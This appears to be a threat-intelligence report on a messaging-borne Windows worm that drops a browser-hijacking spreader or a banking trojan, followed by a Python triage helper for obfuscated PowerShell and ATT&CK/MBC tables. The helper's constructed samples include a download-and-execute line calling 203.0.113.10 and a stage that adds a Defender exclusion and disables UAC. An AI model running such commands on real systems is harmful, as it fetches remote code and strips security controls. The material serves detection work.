EXECUTIVE SUMMARY:
This campaign leverages web-based instant messaging sessions to deliver a self-propagating Windows worm that targets desktop users in a specific national financial market. Attackers distribute a compressed archive containing a crafted Windows shortcut file which, when opened on a desktop, executes an obfuscated command that decodes and runs a staged PowerShell script. The first scripted stage uses a legitimate system process as cover to fetch a second-stage command from remote infrastructure and attempts to alter local security controls to reduce detection. Depending on runtime checks, the chain either installs a browser automation component that takes control of the victim's authenticated web messaging session and forwards the same malicious archive to their contacts, giving the worm contact-based propagation, or it installs a feature-rich banking trojan tailored to monitor and interact with active browser sessions for financial and exchange activity. Affected systems are Windows desktop environments where users access the messaging web client and open archive attachments locally.
The technical chain is multi-stage and intentionally obfuscated to frustrate detection and analysis. The initial artifact is a compressed archive delivered through a trusted messaging contact; inside is a Windows LNK shortcut whose target field contains an obfuscated command that reconstructs and executes a Base64-encoded PowerShell payload. The first PowerShell stage covertly spawns a legitimate system process and uses it to download a second-stage PowerShell command from remote infrastructure. The second stage contains comments and commands aimed at weakening local defenses, specifically adding security-product exclusions and altering elevation (UAC) controls. The actor performs environment and anti-analysis checks and then selectively delivers one of two payloads: a widely used browser automation framework plus its matching driver, used to control the already-authenticated web messaging session and send the malicious archive to the victim's contacts, or a managed .NET banking trojan that monitors active browser sessions and activates only when traffic matches targeted financial and exchange domains.
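The launch chain described above (LNK target that rebuilds a Base64 payload and hands it to PowerShell, then a second interpreter fed via -EncodedCommand, then exclusion and UAC tampering) leaves a recognisable trail in process-creation telemetry. The following triage helper is an added example written for this page; it is not code from the original report or from the campaign. It assumes the input is the CommandLine field of a process-creation event (for example Sysmon Event ID 1 or Security event 4688). The three sample command lines, the two stand-in stage scripts and the TEST-NET address 203.0.113.10 are all constructed for the example and are not observed indicators.

```python
"""Triage helper for obfuscated PowerShell launch chains.

Added example, not from the original report.  Input: the CommandLine of a
process-creation event.  The samples at the bottom are constructed; the
flag names, cmdlets and registry value names are real Windows/PowerShell ones.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Base64 literal passed to [Convert]::FromBase64String(...): the LNK-style
# "rebuild the script inline and IEX it" pattern.
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

# Behaviours to flag, matched over the visible command line plus any decoded payload.
INDICATORS: Dict[str, re.Pattern] = {
    "hidden_window":      re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "policy_bypass":      re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
    "download_cradle":    re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                                     r"Invoke-RestMethod|\birm\b|Net\.WebClient"),
    "inline_decode_exec": re.compile(r"(?i)FromBase64String.*?(?:\biex\b|Invoke-Expression)|"
                                     r"(?:\biex\b|Invoke-Expression).*?FromBase64String"),
    # Stage-two goals named in the report: product exclusions and UAC tampering.
    "defender_exclusion": re.compile(r"(?i)Add-MpPreference\s.*?-Exclusion(?:Path|Process|Extension)"),
    "defender_disable":   re.compile(r"(?i)Set-MpPreference\s.*?-Disable\w+"),
    "uac_tamper":         re.compile(r"(?i)EnableLUA|ConsentPromptBehaviorAdmin|PromptOnSecureDesktop"),
}
TAMPER = {"defender_exclusion", "defender_disable", "uac_tamper"}


def decode_b64(blob: str) -> Optional[str]:
    """Decode Base64 and pick the text encoding: -EncodedCommand payloads are
    UTF-16LE (every second byte is NUL for ASCII text), FromBase64String blobs
    are normally UTF-8.  Returns None if the blob is not valid Base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_encoded_payload(cmdline: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand (PowerShell accepts any
    prefix: -e, -ec, -enc, ...) or behind a FromBase64String('...') literal."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag[1:].lower()
        if flag[0] in "-/" and name and "encodedcommand".startswith(name):
            decoded = decode_b64(value.strip("'\""))
            if decoded is not None:
                return decoded
    match = B64_LITERAL.search(cmdline)
    return decode_b64(match.group(1)) if match else None


def triage(cmdline: str) -> Dict[str, object]:
    """Decode what can be decoded, run the indicators over visible plus decoded
    text, and return a coarse verdict for the analyst queue."""
    payload = extract_encoded_payload(cmdline)
    text = cmdline if payload is None else cmdline + "\n" + payload
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if TAMPER.intersection(hits):
        verdict = "defence_tampering"
    elif {"download_cradle", "inline_decode_exec"}.intersection(hits) and "hidden_window" in hits:
        verdict = "hidden_staged_download"
    elif hits:
        verdict = "review"
    else:
        verdict = "none"
    return {"decoded": payload, "indicators": hits, "verdict": verdict}


def b64_text(text: str, encoding: str) -> str:
    """Encode a script the way the launcher would (UTF-8 for FromBase64String,
    UTF-16LE for -EncodedCommand)."""
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed stand-ins for the two scripted stages (not the real payloads).
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s2.ps1')"
STAGE2 = ("Add-MpPreference -ExclusionPath $env:APPDATA; "
          "Set-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System "
          "-Name EnableLUA -Value 0")

SAMPLE_CMDLINES = [
    # routine admin use: should produce no indicators
    "powershell.exe -NoProfile -Command Get-Service -Name WinDefend",
    # LNK-target style: hidden window, policy bypass, inline Base64 decode + IEX
    "cmd.exe /c powershell -w hidden -nop -ep bypass -c \"IEX([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('" + b64_text(STAGE1, "utf-8") + "')))\"",
    # second stage handed to a fresh interpreter via -enc (UTF-16LE Base64)
    "powershell.exe -nop -w hidden -enc " + b64_text(STAGE2, "utf-16-le"),
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        print(result["verdict"], result["indicators"])
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```

The encoding heuristic matters in practice: decoding a -EncodedCommand blob as UTF-8 yields NUL-interleaved text that defeats every string match, so the decoder checks for the UTF-16LE NUL pattern before choosing. Exclusion additions are also legitimate administrative actions, so the "defence_tampering" verdict is a review priority, not an automatic block.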
The campaign combines trusted-contact social engineering, multi-stage script execution, selective payload staging, and browser session manipulation to pursue financially motivated objectives while propagating efficiently through contacts. Observed impacts include widespread obfuscated PowerShell execution across many endpoints, attempts to alter local security controls to reduce detection, installation of browser automation tooling that hijacks authenticated messaging sessions to propagate the worm, and conditional deployment of a banking trojan on hosts that match the financial targeting criteria. The design balances stealth against spread: obfuscation and the use of legitimate processes and tools reduce the probability of detection, while session hijacking and delivery via trusted contacts increase the likelihood that recipients execute the archive. In the broader threat landscape, this campaign aligns with financially motivated actors that prioritize targeted banking fraud, use living-off-the-land script execution, and leverage legitimate automation tooling to extend capabilities and complicate detection and analysis.
THREAT PROFILE:
Tactic | Technique ID | Technique | Sub-technique
Resource Development | T1588.002 | Obtain Capabilities | Tool
Resource Development | T1587.001 | Develop Capabilities | Malware
Resource Development | T1583.001 | Acquire Infrastructure | Domains
Initial Access | T1566.003 | Phishing | Spearphishing via Service
Execution | T1204.002 | User Execution | Malicious File
Execution | T1059.001 | Command and Scripting Interpreter | PowerShell
Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder
Defense Evasion | T1036.005 | Masquerading | Match Legitimate Name or Location
Defense Evasion | T1027.010 | Obfuscated Files or Information | Command Obfuscation
Defense Evasion | T1562.001 | Impair Defenses | Disable or Modify Tools
Defense Evasion | T1548.002 | Abuse Elevation Control Mechanism | Bypass User Account Control
Credential Access | T1552.001 | Unsecured Credentials | Credentials In Files
Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers
Collection | T1005 | Data from Local System | -
Collection | T1560.001 | Archive Collected Data | Archive via Utility
Command and Control | T1071.001 | Application Layer Protocol | Web Protocols
Exfiltration | T1041 | Exfiltration Over C2 Channel | -
MBC MAPPING:
Objective | Behavior ID | Behavior
Execution | E1204 | User Execution
Execution | E1059 | Command and Scripting Interpreter
Persistence | F0012 | Registry Run Keys / Startup Folder
Persistence | F0013 | Scheduled Tasks
Defense Evasion | E1027 | Obfuscated Files or Information
Defense Evasion | F0006 | Indicator Blocking
Defense Evasion | E1055 | Process Injection
Discovery | E1082 | System Information Discovery
Discovery | E1083 | File and Directory Discovery
Command and Control | C0002 | HTTP Communication
Exfiltration | E1020 | Automated Exfiltration
Impact | B0016 | Compromise Data Integrity